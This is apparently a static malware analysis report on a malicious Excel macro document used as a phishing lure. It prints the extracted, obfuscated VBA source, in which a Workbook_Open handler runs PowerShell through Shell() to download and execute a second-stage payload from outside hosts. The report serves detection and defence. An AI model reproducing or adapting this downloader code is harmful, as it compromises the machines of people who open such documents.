Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 93f58647595e2d04…

MALICIOUS

Office (OLE)

84.0 KB Created: 2000-07-27 22:24:14 Authoring application: Microsoft Macintosh Excel First seen: 2020-01-07
MD5: 66fbeb304d592e4a7f203994732f3f71 SHA-1: 9dcba8e099b4b624e5e68a33b3406e9013772f02 SHA-256: 93f58647595e2d0457a230374db1cbc7b7e97b7e40a1b4079d7b6eef3b6767fc
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, including a Workbook_Open event, which is a common technique for malicious Office documents. The macros utilize the Shell() function to execute a command. The script attempts to download and execute a second-stage payload from the URLs 'http://hammer/0iop' and 'http://nov7/0edf.exe', and saves it as 'C:\Users\Public\ntdll.dll'. The document body appears to be a financial form, likely used as a lure.

Heuristics 5

  • ClamAV: Doc.Downloader.Agent-6333861-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Agent-6333861-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6009 bytes
SHA-256: b646398ae16ce4422d0c80e74a35b0f1a80d4e1fd7cc3251ec4e5cd98d404ef1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function funter()
funter = Left(Right(index1, 9), 1)
End Function
Function gamerton()
azerba = "000120~.-00"
gamerton = Left(Right(azerba, 4), 1)
End Function
Function tormo()
tormo = "  -e"
End Function
Function sdokj()
sdokj = "^xe^  "
End Function
Function tiomet()
wasert = "^a" + "ol" + "n" & "w^"
tiomet = wasert
End Function
Function dyyy()
tbooop = "F ;m^od^naR^.me^t" + "s^yS ^tc^ej^bO^-we^N = modnar$"
dyyy = StrReverse(tbooop)
End Function
Function porekol()
porekol = Array(1, Timer(), Timer(), Timer(), Timer(), Timer(), Null, Timer(), Timer(), msoSyncAvailableNone, Timer(), Timer(), "pr" + "O^F", Timer(), Hour(Now), Timer(), Null)
End Function
Function hitlre()
hitlre = "r^oc" + "e^ss $p" + "p; b^re^" + "ak; } c^at" + "^ch { Wr^i" + "t^e-Ho^"
End Function
Function legogame()
legogame = Join(Array(molvins()(7), dfopp()(4), semiik()(5)), "")
End Function
Sub Workbook_Open()
If xlDisplayUnitLabel > 10 Then
If xlSplitByCustomSplit > 0 Then
tipolerto = Shell(legogame & indor & belg & muntic, o)
End If
End If
End Sub
Function belg()
tems = "pp"
erowsf = "a^ch(" + "$um in"
uppdo = "-Wi^ " & "1 -N^" + "O^Pr^  " + dyyy + "o^re" + erowsf + " @({" + nacols + "tp:/" + "/" + hammer + "/0iop" + gamerton + "e"
doss = funter + "e},{h" + "tt" + "p:" + "//" + nov7 + "/0edf.ex" + "e})) { t^ry { $fg = $ra^n^do^m" + gamerton + "n^e^xt(0, 61180); $"
eco1 = tems + " = '%" + Left(erowsf, 1) + tems + "da" + "ta%\' + $fg + '.e" + funter + "e'" + miolenara
sno = "wnl^o^ad^Fi^le($um.ToString(), $pp); S^ta^rt-^P" + hitlre + "st $err^or[0].E^x^cep^ti^on " + "} }"
belg = uppdo & doss & eco1 & sno
End Function
Function index1()
index1 = "vpovage xssrafter"
End Function
Function nacols()
jonny = "appple nahten textilev"
nacols = Right(Left(jonny, 11), 2)
End Function
Function dfopp()
xelofom = Right(Left(index1, 7), 1)
dfopp = Array(Minute(Now), Date, Date, Date, "d" & gamerton + xelofom + funter, Minute(Now), Hour(Now), Date, 1, Timer())
End Function
Function nov7()
diom = Array(xlZero, Timer(), "el-ta", Timer(), "t/t", Timer(), Minute(Now), Timer(), Timer(), Timer(), "t" & Null, Timer(), Minute(Now), Timer(), Timer(), Timer(), Null)
nov7 = "trav" + Array(diom(2) + "xi.ne" + diom(4) + "es" + diom(10))(0)
End Function
Function semiik()
semiik = Array(Date, Date, Day(Now), Minute(Now), Hour(Now), Right(Left(index1, 7), 1) & "  " + Chr(47) + "c """, 0, 0, Timer(), Day(Now), Day(Now))
End Function
Function muntic()
    muntic = """"
End Function
Function hammer()
yoppl = Array(12, Timer(), Minute(Now), "naw", Timer(), Timer(), "a35.n", Timer(), Timer(), Timer(), "et/" & Null, Timer(), Timer(), Null, Timer(), Timer(), Timer(), 0)
hammer = "oki" & Array(yoppl(3) & yoppl(6) & yoppl(10) & "m")(0)
End Function
Function molvins()
molvins = Array(Nothing, "", Timer(), Null, Minute(Now), Null, Minute(Now), "C" + Chr(77), Minute(Now), Hour(Now), Nothing, 0, Second(Now))
End Function
Function miolenara()
ana = "o^D.^)t^n" & "^ei^lc^b^e" + "w.^t^e" + "n.me^t^s" + "y^s tc" + "ej^bo^-" + "w^en^(^ ;"
miolenara = StrReverse(ana)
End Function
Function indor()
havvor = "" & "O"
calero = "D" + ""
sefort = Array(2, 1, Date, Minute(Now), "  " + "-" + "W" + "^" & "In" & Null, Date, Null, Date, Date, Date, Date, "-nO^" & Null, Date, Date, Date, Date, Null)
nalbert = Array(1, Date, Date, Date, Minute(Now), Date, Null, 3, Date, Date, people, Date, 4, Date, Date, Minute(Now), "^Ni^" & "Nt" & Null, Null)
a180 = Array(2, Date, Date, Date, Date, Date, Null, Date, Date, Date, Minute(Now), Date, Date, calero & "O^ws^" + " 1" & Null, Date, Date, Date, Date, Null)
holms = "^.e" & sdokj & sefort(11) + "l -" + "No" + nalbert(16) + Chr(94) & sefort(4) & a180(13)
mibos = Array(Date, Date, 0, Date, Nul
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.